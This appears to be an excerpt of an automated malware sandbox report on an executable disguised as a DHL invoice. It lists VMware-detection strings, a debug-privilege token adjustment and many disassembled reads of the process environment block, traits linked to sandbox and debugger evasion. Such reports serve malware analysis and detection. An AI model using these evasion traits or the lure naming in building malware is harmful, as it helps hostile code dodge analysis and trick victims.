          Source: explorer.exe, 00000005.00000000.390916923.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.403668866.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148B944 mov eax, dword ptr fs:[00000030h]3_2_0148B944
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C962 mov eax, dword ptr fs:[00000030h]3_2_0146C962
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B171 mov eax, dword ptr fs:[00000030h]3_2_0146B171
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469100 mov eax, dword ptr fs:[00000030h]3_2_01469100
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]3_2_01484120
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov ecx, dword ptr fs:[00000030h]3_2_01484120
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149513A mov eax, dword ptr fs:[00000030h]3_2_0149513A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014F41E8 mov eax, dword ptr fs:[00000030h]3_2_014F41E8
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B1E1 mov eax, dword ptr fs:[00000030h]3_2_0146B1E1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148C182 mov eax, dword ptr fs:[00000030h]3_2_0148C182
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A185 mov eax, dword ptr fs:[00000030h]3_2_0149A185
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492990 mov eax, dword ptr fs:[00000030h]3_2_01492990
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E69A6 mov eax, dword ptr fs:[00000030h]3_2_014E69A6
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014961A0 mov eax, dword ptr fs:[00000030h]3_2_014961A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]3_2_014E51BE
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]3_2_015249A4
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01480050 mov eax, dword ptr fs:[00000030h]3_2_01480050
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01522073 mov eax, dword ptr fs:[00000030h]3_2_01522073
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01531074 mov eax, dword ptr fs:[00000030h]3_2_01531074
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01534015 mov eax, dword ptr fs:[00000030h]3_2_01534015
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01534015 mov eax, dword ptr fs:[00000030h]3_2_01534015
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]3_2_014E7016
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]3_2_014E7016
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]3_2_014E7016
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]3_2_0149002D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]3_2_0149002D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]3_2_0149002D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]3_2_0149002D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]3_2_0149002D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]3_2_0147B02A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]3_2_0147B02A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]3_2_0147B02A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]3_2_0147B02A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov ecx, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]3_2_014640E1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]3_2_014640E1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]3_2_014640E1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014658EC mov eax, dword ptr fs:[00000030h]3_2_014658EC
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469080 mov eax, dword ptr fs:[00000030h]3_2_01469080
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3884 mov eax, dword ptr fs:[00000030h]3_2_014E3884
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3884 mov eax, dword ptr fs:[00000030h]3_2_014E3884
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A90AF mov eax, dword ptr fs:[00000030h]3_2_014A90AF
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov ecx, dword ptr fs:[00000030h]3_2_0149F0BF
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov eax, dword ptr fs:[00000030h]3_2_0149F0BF
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov eax, dword ptr fs:[00000030h]3_2_0149F0BF
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146DB40 mov eax, dword ptr fs:[00000030h]3_2_0146DB40
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538B58 mov eax, dword ptr fs:[00000030h]3_2_01538B58
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146F358 mov eax, dword ptr fs:[00000030h]3_2_0146F358
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146DB60 mov ecx, dword ptr fs:[00000030h]3_2_0146DB60
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01493B7A mov eax, dword ptr fs:[00000030h]3_2_01493B7A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01493B7A mov eax, dword ptr fs:[00000030h]3_2_01493B7A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152131B mov eax, dword ptr fs:[00000030h]3_2_0152131B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E53CA mov eax, dword ptr fs:[00000030h]3_2_014E53CA
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E53CA mov eax, dword ptr fs:[00000030h]3_2_014E53CA
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148DBE9 mov eax, dword ptr fs:[00000030h]3_2_0148DBE9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01471B8F mov eax, dword ptr fs:[00000030h]3_2_01471B8F
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01471B8F mov eax, dword ptr fs:[00000030h]3_2_01471B8F
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151D380 mov ecx, dword ptr fs:[00000030h]3_2_0151D380
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152138A mov eax, dword ptr fs:[00000030h]3_2_0152138A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149B390 mov eax, dword ptr fs:[00000030h]3_2_0149B390
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492397 mov eax, dword ptr fs:[00000030h]3_2_01492397
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]3_2_01494BAD
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]3_2_01494BAD
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]3_2_01494BAD
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01535BA5 mov eax, dword ptr fs:[00000030h]3_2_01535BA5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]3_2_01469240
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]3_2_01469240
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]3_2_01469240
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]3_2_01469240
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152EA55 mov eax, dword ptr fs:[00000030h]3_2_0152EA55
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014F4257 mov eax, dword ptr fs:[00000030h]3_2_014F4257
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A927A mov eax, dword ptr fs:[00000030h]3_2_014A927A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151B260 mov eax, dword ptr fs:[00000030h]3_2_0151B260
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151B260 mov eax, dword ptr fs:[00000030h]3_2_0151B260
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538A62 mov eax, dword ptr fs:[00000030h]3_2_01538A62
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AA16 mov eax, dword ptr fs:[00000030h]3_2_0152AA16
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AA16 mov eax, dword ptr fs:[00000030h]3_2_0152AA16
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01478A0A mov eax, dword ptr fs:[00000030h]3_2_01478A0A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AA16 mov eax, dword ptr fs:[00000030h]3_2_0146AA16
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AA16 mov eax, dword ptr fs:[00000030h]3_2_0146AA16
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01483A1C mov eax, dword ptr fs:[00000030h]3_2_01483A1C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]3_2_01465210
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov ecx, dword ptr fs:[00000030h]3_2_01465210
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]3_2_01465210
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]3_2_01465210
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A4A2C mov eax, dword ptr fs:[00000030h]3_2_014A4A2C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A4A2C mov eax, dword ptr fs:[00000030h]3_2_014A4A2C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492ACB mov eax, dword ptr fs:[00000030h]3_2_01492ACB
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492AE4 mov eax, dword ptr fs:[00000030h]3_2_01492AE4
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149D294 mov eax, dword ptr fs:[00000030h]3_2_0149D294
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149D294 mov eax, dword ptr fs:[00000030h]3_2_0149D294
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]3_2_014652A5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]3_2_014652A5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]3_2_014652A5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]3_2_014652A5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]3_2_014652A5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147AAB0 mov eax, dword ptr fs:[00000030h]3_2_0147AAB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147AAB0 mov eax, dword ptr fs:[00000030h]3_2_0147AAB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FAB0 mov eax, dword ptr fs:[00000030h]3_2_0149FAB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A3D43 mov eax, dword ptr fs:[00000030h]3_2_014A3D43
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3540 mov eax, dword ptr fs:[00000030h]3_2_014E3540
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01513D40 mov eax, dword ptr fs:[00000030h]3_2_01513D40
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01487D50 mov eax, dword ptr fs:[00000030h]3_2_01487D50
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148C577 mov eax, dword ptr fs:[00000030h]3_2_0148C577
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148C577 mov eax, dword ptr fs:[00000030h]3_2_0148C577
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538D34 mov eax, dword ptr fs:[00000030h]3_2_01538D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152E539 mov eax, dword ptr fs:[00000030h]3_2_0152E539
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]3_2_01494D3B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]3_2_01494D3B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]3_2_01494D3B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AD30 mov eax, dword ptr fs:[00000030h]3_2_0146AD30
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014EA537 mov eax, dword ptr fs:[00000030h]3_2_014EA537
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov ecx, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01518DF1 mov eax, dword ptr fs:[00000030h]3_2_01518DF1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147D5E0 mov eax, dword ptr fs:[00000030h]3_2_0147D5E0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147D5E0 mov eax, dword ptr fs:[00000030h]3_2_0147D5E0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]3_2_0152FDE2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]3_2_0152FDE2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]3_2_0152FDE2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]3_2_0152FDE2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]3_2_01492581
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]3_2_01492581
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]3_2_01492581
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]3_2_01492581
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]3_2_01462D8A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]3_2_01462D8A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]3_2_01462D8A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]3_2_01462D8A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]3_2_01462D8A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FD9B mov eax, dword ptr fs:[00000030h]3_2_0149FD9B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FD9B mov eax, dword ptr fs:[00000030h]3_2_0149FD9B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014935A1 mov eax, dword ptr fs:[00000030h]3_2_014935A1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]3_2_01491DB5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]3_2_01491DB5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]3_2_01491DB5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015305AC mov eax, dword ptr fs:[00000030h]3_2_015305AC
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015305AC mov eax, dword ptr fs:[00000030h]3_2_015305AC
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A44B mov eax, dword ptr fs:[00000030h]3_2_0149A44B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FC450 mov eax, dword ptr fs:[00000030h]3_2_014FC450
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FC450 mov eax, dword ptr fs:[00000030h]3_2_014FC450
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148746D mov eax, dword ptr fs:[00000030h]3_2_0148746D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]3_2_014E6C0A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]3_2_014E6C0A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]3_2_014E6C0A
